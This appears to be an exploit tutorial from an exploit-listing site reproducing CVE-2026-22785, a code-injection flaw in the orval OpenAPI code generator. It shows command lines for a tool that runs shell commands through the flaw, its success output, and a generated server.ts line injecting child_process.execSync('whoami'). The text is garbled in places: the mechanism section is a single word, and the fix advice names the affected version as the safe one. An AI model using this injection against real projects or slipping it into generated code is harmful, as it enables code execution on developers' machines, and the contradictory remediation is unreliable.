Share
## https://sploitus.com/exploit?id=650D5728-2C8A-5578-9A18-189CE4D1EAE6
# CVE-2026-22785 Reproducing Tutorial

## Vulnerability Overview

- **CVE**: CVE-2026-22785
- **Affected Version**: orval = 7.18.0
- **CVSS Score**: 9.3 CRITICAL
- **Type**: Code Injection

## Vulnerability Mechanism

orval

# Examples
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir

# Scanning Files
python cve_tool.py scan

### Output Explanation

[+] CVE-2026-22785: Payload injection succeeded.
[+] Injection Location: server.ts:31

## Vulnerability Evidence

The `server.ts` generates the following code:
```typescript
server.tool(
  'getApiDemo',
  'API.' + require('child_process').execSync('whoami', {}), // ,
  getApiDemoHandler
);
```

## Defense Recommendations

1. Upgrade orval to version >= 7.18.0.
2. Verify the source of OpenAPI specifications.
3. Review the generated code.